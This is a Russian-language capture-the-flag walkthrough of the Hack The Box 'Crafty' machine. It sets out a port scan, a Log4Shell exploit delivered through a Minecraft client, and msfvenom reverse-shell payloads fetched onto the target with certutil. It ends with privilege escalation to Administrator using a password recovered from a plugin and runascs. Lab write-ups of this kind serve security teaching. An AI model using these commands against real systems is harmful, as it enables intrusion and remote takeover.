Видео-версия

Весь новый контент сначала выходит на канале t.me/kiberdruzhinnik. Подпишись, чтобы не пропускать его!

Смотри на t.me/kiberdruzhinnik/175.

Обзор сервисов

Как думаете, стоит писать, с чего начинаем исследование?

$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.225.128 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.225.128:80
Open 10.129.225.128:25565
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.225.128
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-10 14:04 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Initiating Ping Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Ping Scan at 14:04, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:04
Completed Parallel DNS resolution of 1 host. at 14:04, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Connect Scan at 14:04, 2.45s elapsed (2 total ports)
Initiating Service scan at 14:04
NSE: Script scanning 10.129.225.128.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 5.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.129.225.128
Host is up, received syn-ack (0.15s latency).
Scanned at 2024-02-10 14:04:14 EST for 8s

PORT      STATE    SERVICE   REASON      VERSION
80/tcp    filtered http      no-response
25565/tcp filtered minecraft no-response

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

Нужно сразу занести crafty.htb в /etc/hosts.

alt text

alt text

Домен play.crafty.htb также занесем в /etc/hosts, но он нам не понадобится.

Публичный эксплоит RCE

Воспользуемся эксплоитом:

$ git clone https://github.com/kozmer/log4j-shell-poc
$ cd log4j-shell-poc
# меняем /bin/sh на cmd.exe, у нас ведь Windows-машина
$ nano poc.py
$ wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ tar -zxf jdk-8u181-linux-x64.tar.gz
$ mv jdk1.8.0_181 jdk1.8.0_20
$ rlwrap nc -lnvp 4242
# в отдельном окне, нам покажут пейлоад
$ python3 poc.py --userip 10.10.14.86 --webport 4243 --lport 4242
# копируем пейлоад и открываем еще одно окно
$ git clone https://github.com/ammaraskar/pyCraft
$ cd pyCraft
$ python3 -m venv env 
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 start.py
# пользователь
> 1
# пустой пароль
>
# сервер
> 10.129.225.128
# наш пейлоад
> ...

alt text

Флаг пользователя

alt text

Повышение привилегий

В папке server/plugins обнаружим плагин к серверу.

C:\Users\svc_minecraft\server>cd plugins
C:\Users\svc_minecraft\server\plugins>dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of C:\Users\svc_minecraft\server\plugins

10/27/2023  01:48 PM    <DIR>          .
10/27/2023  01:48 PM    <DIR>          ..
10/27/2023  01:48 PM             9,996 playercounter-1.0-SNAPSHOT.jar
               1 File(s)          9,996 bytes
               2 Dir(s)   3,257,896,960 bytes free

Перейдем на Meterpreter.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o s.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4244
run
$ python3 -m http.server 4243

На удаленной машине.

certutil -urlcache -f http://10.10.14.86:4243/s.exe %temp%/s.exe
start %temp%/s.exe

Скачиваем файл playercounter-1.0-SNAPSHOT.jar:

alt text

С помощью jd-gui находим RCON пароль для управления сервером:

alt text

Сам RCON выключен в настройках сервера, но пароль подходит для админской учетной записи.

Загрузим на машину скомпилированный runascs.exe и получим шелл.

Тут генерируем нагрузку и запускаем слушателя.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4246 -f exe -o s2.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4246
run

А тут исполняем нашу нагрузку с помощью пользователя Administrator.

runascs.exe "Administrator" "xxx" "C:\\users\\svc_minecraft\\server\\logs\\s2.exe"

alt text

Флаг суперпользователя

alt text